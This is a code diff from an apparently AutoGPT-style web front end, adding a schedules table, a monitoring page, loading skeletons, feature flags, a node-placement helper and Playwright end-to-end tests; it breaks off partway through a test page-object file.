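For context, the series colors above derive a stable hue from each id: hashString(id) is multiplied by 137.5 (roughly the golden angle) and wrapped into 0-360, which spreads consecutive hash values far apart on the color wheel so different agents get distinct, deterministic colors. A minimal sketch of the same idea, using a simple local hash purely for illustration (the app uses its own hashString utility from @/lib/utils):

function hueForId(id: string): string {
  // Illustrative hash only; any stable string-to-integer hash works here.
  let hash = 0;
  for (const ch of id) hash = (hash * 31 + ch.charCodeAt(0)) | 0;
  const hue = (Math.abs(hash) * 137.5) % 360; // golden-angle-style spacing
  return `hsl(${hue}, 70%, 50%)`;
}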

View File

@@ -0,0 +1,285 @@
import { LibraryAgent } from "@/lib/autogpt-server-api";
import { GraphExecutionJobInfo } from "@/app/api/__generated__/models/graphExecutionJobInfo";
import { Button } from "@/components/__legacy__/ui/button";
import { Card } from "@/components/__legacy__/ui/card";
import {
Table,
TableBody,
TableCell,
TableHead,
TableHeader,
TableRow,
} from "@/components/__legacy__/ui/table";
import { Badge } from "@/components/__legacy__/ui/badge";
import { ScrollArea } from "@/components/__legacy__/ui/scroll-area";
import { ClockIcon, Loader2 } from "lucide-react";
import { useToast } from "@/components/molecules/Toast/use-toast";
import { humanizeCronExpression } from "@/lib/cron-expression-utils";
import { useUserTimezone } from "@/lib/hooks/useUserTimezone";
import {
formatScheduleTime,
getTimezoneAbbreviation,
} from "@/lib/timezone-utils";
import {
Select,
SelectContent,
SelectItem,
SelectTrigger,
SelectValue,
} from "@/components/__legacy__/ui/select";
import { useRouter } from "next/navigation";
import { useState } from "react";
import {
Dialog,
DialogContent,
DialogHeader,
DialogTitle,
} from "@/components/__legacy__/ui/dialog";
import { TextRenderer } from "../../../../components/__legacy__/ui/render";
import { Input } from "../../../../components/__legacy__/ui/input";
import { Label } from "../../../../components/__legacy__/ui/label";
interface SchedulesTableProps {
schedules: GraphExecutionJobInfo[];
agents: LibraryAgent[];
onRemoveSchedule: (scheduleId: string, enabled: boolean) => void;
sortColumn: keyof GraphExecutionJobInfo;
sortDirection: "asc" | "desc";
onSort: (column: keyof GraphExecutionJobInfo) => void;
}
export const SchedulesTable = ({
schedules,
agents,
onRemoveSchedule,
sortColumn,
sortDirection,
onSort,
}: SchedulesTableProps) => {
const { toast } = useToast();
const router = useRouter();
const [selectedAgent, setSelectedAgent] = useState<string>(""); // Library Agent ID
const [selectedVersion, setSelectedVersion] = useState<number>(0); // Graph version
const [maxVersion, setMaxVersion] = useState<number>(0);
const [isDialogOpen, setIsDialogOpen] = useState(false);
const [isLoading, setIsLoading] = useState(false);
const [selectedFilter, setSelectedFilter] = useState<string>(""); // Graph ID
// Get user's timezone for displaying schedule times
const userTimezone = useUserTimezone() ?? "UTC";
const filteredAndSortedSchedules = [...schedules]
.filter(
(schedule) => !selectedFilter || schedule.graph_id === selectedFilter,
)
.sort((a, b) => {
const aValue = a[sortColumn];
const bValue = b[sortColumn];
if (sortDirection === "asc") {
return String(aValue).localeCompare(String(bValue));
}
return String(bValue).localeCompare(String(aValue));
});
const handleToggleSchedule = (scheduleId: string, enabled: boolean) => {
onRemoveSchedule(scheduleId, enabled);
if (!enabled) {
toast({
title: "Schedule Disabled",
description: "The schedule has been successfully disabled.",
});
}
};
const handleNewSchedule = () => {
setIsDialogOpen(true);
};
const handleAgentSelect = (agentId: string) => {
setSelectedAgent(agentId);
const agent = agents.find((a) => a.id === agentId);
setMaxVersion(agent!.graph_version);
setSelectedVersion(agent!.graph_version);
};
const handleVersionSelect = (version: string) => {
setSelectedVersion(parseInt(version));
};
const handleSchedule = async () => {
if (!selectedAgent || !selectedVersion) {
toast({
title: "Invalid Input",
description: "Please select an agent and a version.",
variant: "destructive",
});
return;
}
if (selectedVersion < 1 || selectedVersion > maxVersion) {
toast({
title: "Invalid Version",
description: `Please select a version between 1 and ${maxVersion}.`,
variant: "destructive",
});
return;
}
setIsLoading(true);
const agent = agents.find((a) => a.id == selectedAgent)!;
try {
await new Promise((resolve) => setTimeout(resolve, 100));
router.push(
`/build?flowID=${agent.graph_id}&flowVersion=${agent.graph_version}&open_scheduling=true`,
);
    } catch (error) {
      console.error("Navigation error:", error);
      setIsLoading(false); // reset the loading state so the button recovers if navigation fails
    }
};
return (
<Card className="h-fit p-4">
<Dialog open={isDialogOpen} onOpenChange={setIsDialogOpen}>
<DialogContent>
<DialogHeader>
<DialogTitle>Select Agent for New Schedule</DialogTitle>
</DialogHeader>
<Select onValueChange={handleAgentSelect}>
<SelectTrigger className="w-full">
<SelectValue placeholder="Select an agent" />
</SelectTrigger>
<SelectContent>
{agents.map((agent, i) => (
<SelectItem key={agent.id + i} value={agent.id}>
<TextRenderer value={agent.name} truncateLengthLimit={30} />
</SelectItem>
))}
</SelectContent>
</Select>
<Label className="mt-4">
Select version between 1 and {maxVersion}
</Label>
<Input
type="number"
min={1}
max={selectedAgent ? maxVersion : 0}
value={selectedVersion}
onChange={(e) => handleVersionSelect(e.target.value)}
placeholder="Select version"
className="w-full"
/>
<Button
onClick={handleSchedule}
disabled={isLoading || !selectedAgent}
className="mt-4"
>
{isLoading ? (
<>
<Loader2 className="mr-2 h-4 w-4 animate-spin" />
Loading...
</>
) : (
"Schedule"
)}
</Button>
</DialogContent>
</Dialog>
<div className="mb-4 flex items-center justify-between">
<h3 className="text-lg font-semibold">Schedules</h3>
<div className="flex flex-wrap gap-2">
<Select onValueChange={setSelectedFilter}>
<SelectTrigger className="h-8 w-[180px] rounded-md px-3 text-xs">
<SelectValue placeholder="Filter by graph" />
</SelectTrigger>
<SelectContent className="text-xs">
{agents.map((agent) => (
<SelectItem key={agent.id} value={agent.graph_id}>
{agent.name}
</SelectItem>
))}
</SelectContent>
</Select>
<Button size="sm" variant="outline" onClick={handleNewSchedule}>
<ClockIcon className="mr-2 h-4 w-4" />
New Schedule
</Button>
</div>
</div>
<ScrollArea className="max-h-[400px]">
<Table>
<TableHeader>
<TableRow>
<TableHead
onClick={() => onSort("graph_id")}
className="cursor-pointer"
>
Graph Name
</TableHead>
<TableHead className="cursor-pointer">Graph Version</TableHead>
<TableHead
onClick={() => onSort("next_run_time")}
className="cursor-pointer"
>
Next Execution
</TableHead>
<TableHead
onClick={() => onSort("cron")}
className="cursor-pointer"
>
Schedule
</TableHead>
<TableHead>Timezone</TableHead>
<TableHead>Actions</TableHead>
</TableRow>
</TableHeader>
<TableBody>
{filteredAndSortedSchedules.length === 0 ? (
<TableRow>
<TableCell
colSpan={6}
className="py-8 text-center text-lg text-gray-400"
>
No schedules are available
</TableCell>
</TableRow>
) : (
filteredAndSortedSchedules.map((schedule) => (
<TableRow key={schedule.id}>
<TableCell className="font-medium">
{agents.find((a) => a.graph_id === schedule.graph_id)
?.name || schedule.graph_id}
</TableCell>
<TableCell>{schedule.graph_version}</TableCell>
<TableCell>
{formatScheduleTime(schedule.next_run_time, userTimezone)}
</TableCell>
<TableCell>
<Badge variant="secondary">
{humanizeCronExpression(schedule.cron)}
</Badge>
</TableCell>
<TableCell>
<span className="text-sm text-muted-foreground">
{schedule.timezone
? getTimezoneAbbreviation(schedule.timezone)
: userTimezone && getTimezoneAbbreviation(userTimezone)}
</span>
</TableCell>
<TableCell>
<div className="flex space-x-2">
<Button
variant={"destructive"}
onClick={() => handleToggleSchedule(schedule.id, false)}
>
Remove
</Button>
</div>
</TableCell>
</TableRow>
))
)}
</TableBody>
</Table>
</ScrollArea>
</Card>
);
};

View File

@@ -0,0 +1,24 @@
export default function AgentsFlowListSkeleton() {
return (
<div className="mx-auto max-w-4xl p-4">
<div className="mb-4 flex items-center justify-between">
<h1 className="text-2xl font-bold">Agents</h1>
<div className="h-10 w-24 animate-pulse rounded bg-gray-200"></div>
</div>
<div className="rounded-lg bg-white p-4 shadow">
<div className="mb-4 grid grid-cols-3 gap-4 font-medium text-gray-500">
<div>Name</div>
<div># of runs</div>
<div>Last run</div>
</div>
{[...Array(3)].map((_, index) => (
<div key={index} className="mb-4 grid grid-cols-3 gap-4">
<div className="h-6 animate-pulse rounded bg-gray-200"></div>
<div className="h-6 animate-pulse rounded bg-gray-200"></div>
<div className="h-6 animate-pulse rounded bg-gray-200"></div>
</div>
))}
</div>
</div>
);
}

View File

@@ -0,0 +1,23 @@
export default function FlowRunsListSkeleton() {
return (
<div className="mx-auto max-w-4xl p-4">
<div className="rounded-lg bg-white p-4 shadow">
<h2 className="mb-4 text-xl font-semibold">Runs</h2>
<div className="mb-4 grid grid-cols-4 gap-4 text-sm font-medium text-gray-500">
<div>Agent</div>
<div>Started</div>
<div>Status</div>
<div>Duration</div>
</div>
{[...Array(4)].map((_, index) => (
<div key={index} className="mb-4 grid grid-cols-4 gap-4">
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
<div className="h-5 animate-pulse rounded bg-gray-200"></div>
</div>
))}
</div>
</div>
);
}

View File

@@ -0,0 +1,28 @@
export default function FlowRunsStatusSkeleton() {
return (
<div className="mx-auto max-w-4xl p-4">
<div className="rounded-lg bg-white p-4 shadow">
<div className="mb-6 flex items-center justify-between">
<h2 className="text-xl font-semibold">Stats</h2>
<div className="flex space-x-2">
{["2h", "8h", "24h", "7d", "Custom", "All"].map((btn) => (
<div
key={btn}
className="h-8 w-16 animate-pulse rounded bg-gray-200"
></div>
))}
</div>
</div>
{/* Placeholder for the line chart */}
<div className="mb-6 h-64 w-full animate-pulse rounded bg-gray-200"></div>
{/* Placeholders for total runs and total run time */}
<div className="space-y-2">
<div className="h-6 w-1/3 animate-pulse rounded bg-gray-200"></div>
<div className="h-6 w-1/2 animate-pulse rounded bg-gray-200"></div>
</div>
</div>
</div>
);
}

View File

@@ -0,0 +1,21 @@
import AgentFlowListSkeleton from "@/app/(platform)/monitoring/components/skeletons/AgentFlowListSkeleton";
import React from "react";
import FlowRunsListSkeleton from "@/app/(platform)/monitoring/components/skeletons/FlowRunsListSkeleton";
import FlowRunsStatusSkeleton from "@/app/(platform)/monitoring/components/skeletons/FlowRunsStatusSkeleton";
export default function MonitorLoadingSkeleton() {
return (
<div className="space-y-4 p-4">
<div className="grid grid-cols-1 gap-4 md:grid-cols-3">
{/* Agents Section */}
<AgentFlowListSkeleton />
{/* Runs Section */}
<FlowRunsListSkeleton />
{/* Stats Section */}
<FlowRunsStatusSkeleton />
</div>
</div>
);
}

View File

@@ -0,0 +1,151 @@
"use client";
import React, { useCallback, useEffect, useState } from "react";
import { GraphExecutionMeta, LibraryAgent } from "@/lib/autogpt-server-api";
import { GraphExecutionJobInfo } from "@/app/api/__generated__/models/graphExecutionJobInfo";
import {
useGetV1ListExecutionSchedulesForAUser,
useDeleteV1DeleteExecutionSchedule,
} from "@/app/api/__generated__/endpoints/schedules/schedules";
import { okData } from "@/app/api/helpers";
import { Card } from "@/components/__legacy__/ui/card";
import { SchedulesTable } from "@/app/(platform)/monitoring/components/SchedulesTable";
import { useBackendAPI } from "@/lib/autogpt-server-api/context";
import AgentFlowList from "./components/AgentFlowList";
import FlowRunsList from "./components/FlowRunsList";
import FlowRunInfo from "./components/FlowRunInfo";
import FlowInfo from "./components/FlowInfo";
import FlowRunsStatus from "./components/FlowRunsStatus";
const Monitor = () => {
const [flows, setFlows] = useState<LibraryAgent[]>([]);
const [executions, setExecutions] = useState<GraphExecutionMeta[]>([]);
const [selectedFlow, setSelectedFlow] = useState<LibraryAgent | null>(null);
const [selectedRun, setSelectedRun] = useState<GraphExecutionMeta | null>(
null,
);
const [sortColumn, setSortColumn] =
useState<keyof GraphExecutionJobInfo>("id");
const [sortDirection, setSortDirection] = useState<"asc" | "desc">("asc");
const api = useBackendAPI();
// Use generated API hooks for schedules
const { data: schedulesResponse, refetch: refetchSchedules } =
useGetV1ListExecutionSchedulesForAUser();
const deleteScheduleMutation = useDeleteV1DeleteExecutionSchedule();
const schedules = okData(schedulesResponse) ?? [];
const removeSchedule = useCallback(
async (scheduleId: string) => {
await deleteScheduleMutation.mutateAsync({ scheduleId });
refetchSchedules();
},
[deleteScheduleMutation, refetchSchedules],
);
const fetchAgents = useCallback(() => {
api.listLibraryAgents().then((response) => {
setFlows(response.agents);
});
api.getExecutions().then((executions) => {
setExecutions(executions);
});
}, [api]);
useEffect(() => {
fetchAgents();
}, [fetchAgents]);
  // Poll every 5 seconds; fetchAgents is the only dependency, since including flows would recreate the interval on every poll
  useEffect(() => {
    const intervalId = setInterval(() => fetchAgents(), 5000);
    return () => clearInterval(intervalId);
  }, [fetchAgents]);
const column1 = "md:col-span-2 xl:col-span-3 xxl:col-span-2";
const column2 = "md:col-span-3 lg:col-span-2 xl:col-span-3";
const column3 = "col-span-full xl:col-span-4 xxl:col-span-5";
const handleSort = (column: keyof GraphExecutionJobInfo) => {
if (sortColumn === column) {
setSortDirection(sortDirection === "asc" ? "desc" : "asc");
} else {
setSortColumn(column);
setSortDirection("asc");
}
};
return (
<div
className="grid grid-cols-1 gap-4 p-4 md:grid-cols-5 lg:grid-cols-4 xl:grid-cols-10"
data-testid="monitor-page"
>
<AgentFlowList
className={column1}
flows={flows}
executions={executions}
selectedFlow={selectedFlow}
onSelectFlow={(f) => {
setSelectedRun(null);
setSelectedFlow(f.id == selectedFlow?.id ? null : f);
}}
/>
<FlowRunsList
className={column2}
flows={flows}
executions={[
...(selectedFlow
? executions.filter((v) => v.graph_id == selectedFlow.graph_id)
: executions),
].sort((a, b) => {
const aTime = a.started_at?.getTime() ?? 0;
const bTime = b.started_at?.getTime() ?? 0;
return bTime - aTime;
})}
selectedRun={selectedRun}
onSelectRun={(r) => setSelectedRun(r.id == selectedRun?.id ? null : r)}
/>
{(selectedRun && (
<FlowRunInfo
agent={
selectedFlow ||
flows.find((f) => f.graph_id == selectedRun.graph_id)!
}
execution={selectedRun}
className={column3}
/>
)) ||
(selectedFlow && (
<FlowInfo
flow={selectedFlow}
executions={executions.filter(
(e) => e.graph_id == selectedFlow.graph_id,
)}
className={column3}
refresh={() => {
fetchAgents();
setSelectedFlow(null);
setSelectedRun(null);
}}
/>
)) || (
<Card className={`p-6 ${column3}`}>
<FlowRunsStatus flows={flows} executions={executions} />
</Card>
)}
<div className="col-span-full xl:col-span-6">
<SchedulesTable
schedules={schedules} // all schedules
agents={flows} // for filtering purpose
onRemoveSchedule={removeSchedule}
sortColumn={sortColumn}
sortDirection={sortDirection}
onSort={handleSort}
/>
</div>
</div>
);
};
export default Monitor;

View File

@@ -7022,29 +7022,24 @@
"input_schema": {
"additionalProperties": true,
"type": "object",
"title": "Input Schema"
"title": "Input Schema",
"description": "Full JSON schema for block inputs"
},
"output_schema": {
"additionalProperties": true,
"type": "object",
"title": "Output Schema"
"title": "Output Schema",
"description": "Full JSON schema for block outputs"
},
"required_inputs": {
"items": { "$ref": "#/components/schemas/BlockInputFieldInfo" },
"type": "array",
"title": "Required Inputs",
"description": "List of required input fields for this block"
"description": "List of input fields for this block"
}
},
"type": "object",
"required": [
"id",
"name",
"description",
"categories",
"input_schema",
"output_schema"
],
"required": ["id", "name", "description", "categories"],
"title": "BlockInfoSummary",
"description": "Summary of a block for search results."
},
@@ -7090,7 +7085,7 @@
"usage_hint": {
"type": "string",
"title": "Usage Hint",
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the required fields from input_schema."
"default": "To execute a block, call run_block with block_id set to the block's 'id' field and input_data containing the fields listed in required_inputs."
}
},
"type": "object",

File diff suppressed because it is too large

View File

@@ -12,6 +12,7 @@ export const PROTECTED_PAGES = [
"/onboarding",
"/profile",
"/library",
"/monitoring",
] as const;
export const ADMIN_PAGES = ["/admin"] as const;

View File

@@ -2,6 +2,7 @@ import { type ClassValue, clsx } from "clsx";
import _isEmpty from "lodash/isEmpty";
import { twMerge } from "tailwind-merge";
import { NodeDimension } from "@/app/(platform)/build/components/legacy-builder/Flow/Flow";
import {
BlockIOObjectSubSchema,
BlockIORootSchema,
@@ -331,6 +332,81 @@ export function getPrimaryCategoryColor(categories: Category[]): string {
);
}
function rectanglesOverlap(
rect1: { x: number; y: number; width: number; height?: number },
rect2: { x: number; y: number; width: number; height?: number },
): boolean {
const x1 = rect1.x,
y1 = rect1.y,
w1 = rect1.width,
h1 = rect1.height ?? 100;
const x2 = rect2.x,
y2 = rect2.y,
w2 = rect2.width,
h2 = rect2.height ?? 100;
// Check if the rectangles do not overlap
return !(x1 + w1 <= x2 || x1 >= x2 + w2 || y1 + h1 <= y2 || y1 >= y2 + h2);
}
export function findNewlyAddedBlockCoordinates(
nodeDimensions: NodeDimension,
newWidth: number,
margin: number,
zoom: number,
) {
const nodeDimensionArray = Object.values(nodeDimensions);
for (let i = nodeDimensionArray.length - 1; i >= 0; i--) {
const lastNode = nodeDimensionArray[i];
const lastNodeHeight = lastNode.height ?? 100;
// Right of the last node
let newX = lastNode.x + lastNode.width + margin;
let newY = lastNode.y;
let newRect = { x: newX, y: newY, width: newWidth, height: 100 / zoom };
const collisionRight = nodeDimensionArray.some((node) =>
rectanglesOverlap(newRect, node),
);
if (!collisionRight) {
return { x: newX, y: newY };
}
// Left of the last node
newX = lastNode.x - newWidth - margin;
newRect = { x: newX, y: newY, width: newWidth, height: 100 / zoom };
const collisionLeft = nodeDimensionArray.some((node) =>
rectanglesOverlap(newRect, node),
);
if (!collisionLeft) {
return { x: newX, y: newY };
}
// Below the last node
newX = lastNode.x;
newY = lastNode.y + lastNodeHeight + margin;
newRect = { x: newX, y: newY, width: newWidth, height: 100 / zoom };
const collisionBelow = nodeDimensionArray.some((node) =>
rectanglesOverlap(newRect, node),
);
if (!collisionBelow) {
return { x: newX, y: newY };
}
}
// Default position if no space is found
return {
x: 0,
y: 0,
};
}
export function hasNonNullNonObjectValue(obj: any): boolean {
if (obj !== null && typeof obj === "object") {
return Object.values(obj).some((value) => hasNonNullNonObjectValue(value));
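
In short, findNewlyAddedBlockCoordinates above walks the existing nodes from newest to oldest and tries to place the new block to the right of, to the left of, then below the most recently considered node, returning the first position with no rectangle overlap and falling back to (0, 0). A hedged usage sketch with invented node ids and sizes, assuming the function is exported from @/lib/utils:

import { findNewlyAddedBlockCoordinates } from "@/lib/utils";

// Two existing nodes on the canvas (dimensions are made up for the example).
const nodeDimensions = {
  "node-1": { x: 0, y: 0, width: 300, height: 120 },
  "node-2": { x: 350, y: 0, width: 300, height: 160 },
};

// Ask for a spot for a new 300px-wide block with a 50px margin at zoom level 1.
const { x, y } = findNewlyAddedBlockCoordinates(nodeDimensions, 300, 50, 1);
// -> the first right/left/below position that does not overlap an existing node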

View File

@@ -10,6 +10,8 @@ export enum Flag {
NEW_AGENT_RUNS = "new-agent-runs",
GRAPH_SEARCH = "graph-search",
ENABLE_ENHANCED_OUTPUT_HANDLING = "enable-enhanced-output-handling",
NEW_FLOW_EDITOR = "new-flow-editor",
BUILDER_VIEW_SWITCH = "builder-view-switch",
SHARE_EXECUTION_RESULTS = "share-execution-results",
AGENT_FAVORITING = "agent-favoriting",
MARKETPLACE_SEARCH_TERMS = "marketplace-search-terms",
@@ -25,6 +27,8 @@ const defaultFlags = {
[Flag.NEW_AGENT_RUNS]: false,
[Flag.GRAPH_SEARCH]: false,
[Flag.ENABLE_ENHANCED_OUTPUT_HANDLING]: false,
[Flag.NEW_FLOW_EDITOR]: false,
[Flag.BUILDER_VIEW_SWITCH]: false,
[Flag.SHARE_EXECUTION_RESULTS]: false,
[Flag.AGENT_FAVORITING]: false,
[Flag.MARKETPLACE_SEARCH_TERMS]: DEFAULT_SEARCH_TERMS,

View File

@@ -11,18 +11,24 @@ test.beforeEach(async ({ page }) => {
const buildPage = new BuildPage(page);
const testUser = await getTestUser();
const { getId } = getSelectors(page);
await page.goto("/login");
await loginPage.login(testUser.email, testUser.password);
await hasUrl(page, "/marketplace");
await page.goto("/build");
await buildPage.closeTutorial();
await buildPage.openBlocksPanel();
const [dictionaryBlock] = await buildPage.getFilteredBlocksFromAPI(
(block) => block.name === "AddToDictionaryBlock",
);
await buildPage.addBlock(dictionaryBlock);
const blockCard = getId(`block-name-${dictionaryBlock.id}`);
await blockCard.click();
const blockInEditor = getId(dictionaryBlock.id).first();
expect(blockInEditor).toBeAttached();
await buildPage.saveAgent("Test Agent", "Test Description");
await test

View File

@@ -1,6 +1,3 @@
- // TODO: These tests were written for the old (legacy) builder.
- // They need to be updated to work with the new flow editor.
// Note: all the comments with //(number)! are for the docs
//ignore them when reading the code, but if you change something,
//make sure to update the docs! Your autoformmater will break this page,
@@ -15,7 +12,7 @@ import { getTestUser } from "./utils/auth";
// Reason Ignore: admonishment is in the wrong place visually with correct prettier rules
// prettier-ignore
- test.describe.skip("Build", () => { //(1)!
+ test.describe("Build", () => { //(1)!
let buildPage: BuildPage; //(2)!
// Reason Ignore: admonishment is in the wrong place visually with correct prettier rules

View File

@@ -0,0 +1,140 @@
import test, { expect, TestInfo } from "@playwright/test";
import { BuildPage } from "./pages/build.page";
import { MonitorPage } from "./pages/monitor.page";
import { v4 as uuidv4 } from "uuid";
import * as fs from "fs/promises";
import path from "path";
import { LoginPage } from "./pages/login.page";
import { getTestUser } from "./utils/auth";
import { hasUrl } from "./utils/assertion";
import {
navigateToLibrary,
clickFirstAgent,
runAgent,
waitForAgentPageLoad,
} from "./pages/library.page";
test.describe.configure({
mode: "parallel",
timeout: 30000,
});
// --8<-- [start:AttachAgentId]
test.beforeEach(async ({ page }, testInfo: TestInfo) => {
const loginPage = new LoginPage(page);
const testUser = await getTestUser();
const monitorPage = new MonitorPage(page);
// Start each test with login using worker auth
await page.goto("/login");
await loginPage.login(testUser.email, testUser.password);
await hasUrl(page, "/marketplace");
// Navigate to library and run the first agent
await navigateToLibrary(page);
await clickFirstAgent(page);
await waitForAgentPageLoad(page);
await runAgent(page);
// Navigate to monitoring page
await page.goto("/monitoring");
await test.expect(monitorPage.isLoaded()).resolves.toBeTruthy();
// Generate a test ID for tracking
const id = uuidv4();
testInfo.attach("agent-id", { body: id });
});
// --8<-- [end:AttachAgentId]
test.afterAll(async () => {
// clear out the downloads folder
const downloadsFolder = process.cwd() + "/downloads";
console.log(`clearing out the downloads folder ${downloadsFolder}/monitor`);
await fs.rm(`${downloadsFolder}/monitor`, {
recursive: true,
force: true,
});
});
test.skip("user can export and import agents", async ({
page,
}, testInfo: TestInfo) => {
const monitorPage = new MonitorPage(page);
const buildPage = new BuildPage(page);
// --8<-- [start:ReadAgentId]
if (testInfo.attachments.length === 0 || !testInfo.attachments[0].body) {
throw new Error("No agent id attached to the test");
}
const testAttachName = testInfo.attachments[0].body.toString();
// --8<-- [end:ReadAgentId]
const agents = await monitorPage.listAgents();
const downloadPromise = page.waitForEvent("download");
const agent = agents.find(
(a: any) => a.name === `test-agent-${testAttachName}`,
);
if (!agent) throw new Error(`Agent ${testAttachName} not found`);
await monitorPage.exportToFile(agent);
const download = await downloadPromise;
// Wait for the download process to complete and save the downloaded file somewhere.
await download.saveAs(
`${monitorPage.downloadsFolder}/monitor/${download.suggestedFilename()}`,
);
console.log(`downloaded file to ${download.suggestedFilename()}`);
expect(download.suggestedFilename()).toBeDefined();
expect(download.suggestedFilename()).toContain("test-agent-");
expect(download.suggestedFilename()).toContain("v1.json");
// import the agent
const preImportAgents = await monitorPage.listAgents();
const filesInFolder = await fs.readdir(
`${monitorPage.downloadsFolder}/monitor`,
);
const importFile = filesInFolder.find((f) => f.includes(testAttachName));
if (!importFile) {
throw new Error(`No import file found for agent ${testAttachName}`);
}
const baseName = importFile.split(".")[0];
await monitorPage.importFromFile(
path.resolve(monitorPage.downloadsFolder, "monitor"),
importFile,
baseName + "-imported",
);
// You'll be dropped at the build page, so hit run and then go back to monitor
await buildPage.runAgent();
await monitorPage.navbar.clickMonitorLink();
const postImportAgents = await monitorPage.listAgents();
expect(postImportAgents.length).toBeGreaterThan(preImportAgents.length);
console.log(`postImportAgents: ${JSON.stringify(postImportAgents)}`);
const importedAgent = postImportAgents.find(
(a: any) => a.name === `${baseName}-imported`,
);
expect(importedAgent).toBeDefined();
});
test.skip("user can view runs and agents", async ({ page }) => {
const monitorPage = new MonitorPage(page);
// const runs = await monitorPage.listRuns();
const agents = await monitorPage.listAgents();
expect(agents.length).toBeGreaterThan(0);
});

View File

@@ -1,6 +1,7 @@
import { Locator, Page } from "@playwright/test";
import { expect, Locator, Page } from "@playwright/test";
import { Block as APIBlock } from "../../lib/autogpt-server-api/types";
import { beautifyString } from "../../lib/utils";
import { isVisible } from "../utils/assertion";
import { BasePage } from "./base.page";
export interface Block {
@@ -26,39 +27,32 @@ export class BuildPage extends BasePage {
try {
await this.page
.getByRole("button", { name: "Skip Tutorial", exact: true })
.click({ timeout: 3000 });
} catch (_error) {
console.info("Tutorial not shown or already dismissed");
.click();
} catch (error) {
console.info("Error closing tutorial:", error);
}
}
async openBlocksPanel(): Promise<void> {
const popoverContent = this.page.locator(
'[data-id="blocks-control-popover-content"]',
);
const isPanelOpen = await popoverContent.isVisible();
const isPanelOpen = await this.page
.getByTestId("blocks-control-blocks-label")
.isVisible();
if (!isPanelOpen) {
await this.page.getByTestId("blocks-control-blocks-button").click();
await popoverContent.waitFor({ state: "visible", timeout: 5000 });
}
}
async closeBlocksPanel(): Promise<void> {
const popoverContent = this.page.locator(
'[data-id="blocks-control-popover-content"]',
);
if (await popoverContent.isVisible()) {
await this.page.getByTestId("blocks-control-blocks-button").click();
}
await this.page.getByTestId("profile-popout-menu-trigger").click();
}
async saveAgent(
name: string = "Test Agent",
description: string = "",
): Promise<void> {
console.log(`Saving agent '${name}' with description '${description}'`);
await this.page.getByTestId("save-control-save-button").click();
console.log(`💾 Saving agent '${name}' with description '${description}'`);
await this.page.getByTestId("blocks-control-save-button").click();
await this.page.getByTestId("save-control-name-input").fill(name);
await this.page
.getByTestId("save-control-description-input")
@@ -113,34 +107,32 @@ export class BuildPage extends BasePage {
await this.openBlocksPanel();
const searchInput = this.page.locator(
'[data-id="blocks-control-search-bar"] input[type="text"]',
'[data-id="blocks-control-search-input"]',
);
const displayName = this.getDisplayName(block.name);
await searchInput.clear();
await searchInput.fill(displayName);
const blockCardId = block.id.replace(/[^a-zA-Z0-9]/g, "");
const blockCard = this.page.locator(
`[data-id="block-card-${blockCardId}"]`,
);
const blockCard = this.page.getByTestId(`block-name-${block.id}`);
try {
// Wait for the block card to be visible with a reasonable timeout
await blockCard.waitFor({ state: "visible", timeout: 10000 });
await blockCard.click();
const blockInEditor = this.page.getByTestId(block.id).first();
expect(blockInEditor).toBeAttached();
} catch (error) {
console.log(
`Block ${block.name} (display: ${displayName}) returned from the API but not found in block list`,
`❌ ❌ Block ${block.name} (display: ${displayName}) returned from the API but not found in block list`,
);
console.log(`Error: ${error}`);
}
}
async hasBlock(_block: Block) {
// In the new flow editor, verify a node exists on the canvas
const node = this.page.locator('[data-id^="custom-node-"]').first();
await node.isVisible();
async hasBlock(block: Block) {
const blockInEditor = this.page.getByTestId(block.id).first();
await blockInEditor.isVisible();
}
async getBlockInputs(blockId: string): Promise<string[]> {
@@ -167,7 +159,7 @@ export class BuildPage extends BasePage {
// Clear any existing search to ensure we see all blocks in the category
const searchInput = this.page.locator(
'[data-id="blocks-control-search-bar"] input[type="text"]',
'[data-id="blocks-control-search-input"]',
);
await searchInput.clear();
@@ -399,13 +391,13 @@ export class BuildPage extends BasePage {
async isRunButtonEnabled(): Promise<boolean> {
console.log(`checking if run button is enabled`);
const runButton = this.page.locator('[data-id="run-graph-button"]');
const runButton = this.page.getByTestId("primary-action-run-agent");
return await runButton.isEnabled();
}
async runAgent(): Promise<void> {
console.log(`clicking run button`);
const runButton = this.page.locator('[data-id="run-graph-button"]');
const runButton = this.page.getByTestId("primary-action-run-agent");
await runButton.click();
await this.page.waitForTimeout(1000);
await runButton.click();
@@ -432,7 +424,7 @@ export class BuildPage extends BasePage {
async waitForSaveButton(): Promise<void> {
console.log(`waiting for save button`);
await this.page.waitForSelector(
'[data-testid="save-control-save-button"]:not([disabled])',
'[data-testid="blocks-control-save-button"]:not([disabled])',
);
}
@@ -534,22 +526,27 @@ export class BuildPage extends BasePage {
async createDummyAgent() {
await this.closeTutorial();
await this.openBlocksPanel();
const dictionaryBlock = await this.getDictionaryBlockDetails();
const searchInput = this.page.locator(
'[data-id="blocks-control-search-bar"] input[type="text"]',
'[data-id="blocks-control-search-input"]',
);
const displayName = this.getDisplayName(dictionaryBlock.name);
await searchInput.clear();
await searchInput.fill("Add to Dictionary");
const blockCard = this.page.locator('[data-id^="block-card-"]').first();
try {
await blockCard.waitFor({ state: "visible", timeout: 10000 });
await isVisible(this.page.getByText("Output"));
await searchInput.fill(displayName);
const blockCard = this.page.getByTestId(`block-name-${dictionaryBlock.id}`);
if (await blockCard.isVisible()) {
await blockCard.click();
} catch (error) {
console.log("Could not find Add to Dictionary block:", error);
const blockInEditor = this.page.getByTestId(dictionaryBlock.id).first();
expect(blockInEditor).toBeAttached();
}
await this.saveAgent("Test Agent", "Test Description");
await expect(this.isRunButtonEnabled()).resolves.toBeTruthy();
}
}

View File

@@ -252,6 +252,21 @@ export class LibraryPage extends BasePage {
]);
}
async clickMonitoringLink(): Promise<void> {
console.log(`clicking monitoring link in alert`);
await this.page.getByRole("link", { name: "here" }).click();
}
async isMonitoringAlertVisible(): Promise<boolean> {
console.log(`checking if monitoring alert is visible`);
try {
const alertText = this.page.locator("text=/Prefer the old experience/");
return await alertText.isVisible();
} catch {
return false;
}
}
async getSearchValue(): Promise<string> {
console.log(`getting search input value`);
try {

View File

@@ -0,0 +1,237 @@
import { Page } from "@playwright/test";
import { BasePage } from "./base.page";
import path from "path";
interface Agent {
id: string;
name: string;
runCount: number;
lastRun: string;
}
interface Run {
id: string;
agentId: string;
agentName: string;
started: string;
duration: number;
status: string;
}
interface Schedule {
id: string;
graphName: string;
nextExecution: string;
